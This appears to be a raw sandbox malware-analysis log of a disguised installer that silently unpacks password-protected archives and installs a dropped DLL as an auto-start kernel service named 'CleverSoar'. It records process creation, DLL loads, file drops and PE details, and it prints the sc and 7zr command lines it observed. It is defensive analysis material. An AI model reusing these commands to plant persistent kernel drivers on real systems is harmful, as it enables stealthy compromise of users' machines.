Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe | Process created: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp "C:\Users\user~1\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$3043E,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENT
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wbemcomn.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: w32time.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: logoncli.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: vmictimeprovider.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe; Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe; Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Section loaded: apphelp.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe; Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Window found: window name: TMainForm
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe; Static file information: File size 5695204 > 1048576
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 00000013.00000003.1399275561.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 00000013.00000003.1399237456.0000000003550000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.19.dr
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 17_2_00A357D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount; 17_2_00A357D0
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.11.dr; Static PE information: real checksum: 0x0 should be: 0x34399d
Source: updat4.vac.12.dr; Static PE information: real checksum: 0x0 should be: 0x376862
Source: update.vac.12.dr; Static PE information: real checksum: 0x0 should be: 0x376862
Source: update.vac.6.dr; Static PE information: real checksum: 0x0 should be: 0x376862
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe; Static PE information: real checksum: 0x0 should be: 0x576c76
Source: tProtect.dll.19.dr; Static PE information: real checksum: 0x1eb0f should be: 0xfc66
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.3.dr; Static PE information: real checksum: 0x0 should be: 0x34399d
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe; Static PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.3.dr; Static PE information: section name: .didata
Source: update.vac.6.dr; Static PE information: section name: .00cfg
Source: update.vac.6.dr; Static PE information: section name: .voltbl
Source: update.vac.6.dr; Static PE information: section name: .j)q
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.11.dr; Static PE information: section name: .didata
Source: 7zr.exe.12.dr; Static PE information: section name: .sxdata
Source: update.vac.12.dr; Static PE information: section name: .00cfg
Source: update.vac.12.dr; Static PE information: section name: .voltbl
Source: update.vac.12.dr; Static PE information: section name: .j)q
Source: is-H48MF.tmp.12.dr; Static PE information: section name: .xdata
Source: updat4.vac.12.dr; Static PE information: section name: .00cfg
Source: updat4.vac.12.dr; Static PE information: section name: .voltbl
Source: updat4.vac.12.dr; Static PE information: section name: .j)q
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Code function: 12_2_6C97750B push ecx; ret; 12_2_6C97751E
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Code function: 12_2_6C820F00 push ss; retn 0001h; 12_2_6C820F0A
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Code function: 12_2_6CA44F10 push eax; ret; 12_2_6CA44F2E
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Code function: 12_2_6C9A99F4 push 004AC35Ch; ret; 12_2_6C9A9A0E
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 17_2_009B45F4 push 00A5C35Ch; ret; 17_2_009B460E
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 17_2_00A4FB10 push eax; ret; 17_2_00A4FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 17_2_00A4FE90 push eax; ret; 17_2_00A4FEBE
Source: update.vac.6.dr; Static PE information: section name: .j)q entropy: 7.186767136264165
Source: update.vac.12.dr; Static PE information: section name: .j)q entropy: 7.186767136264165
Source: updat4.vac.12.dr; Static PE information: section name: .j)q entropy: 7.186767136264165
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; File created: C:\Users\user\AppData\Local\Temp\is-CH3DR.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; File created: C:\Program Files (x86)\Windows NT\trash (copy)
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; File created: C:\Users\user\AppData\Local\Temp\is-LO727.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe; File created: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe; File created: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; File created: C:\Program Files (x86)\Windows NT\7zr.exe
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe; File created: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; File created: C:\Users\user\AppData\Local\Temp\is-LO727.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; File created: C:\Program Files (x86)\Windows NT\is-H48MF.tmp
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; File created: C:\Program Files (x86)\Windows NT\updat4.vac
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; File created: C:\Users\user\AppData\Local\Temp\is-CH3DR.tmp\_isetup\_setup64.tmp
Source: C:\Windows\System32\svchost.exe; Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\Config
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\svchost.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
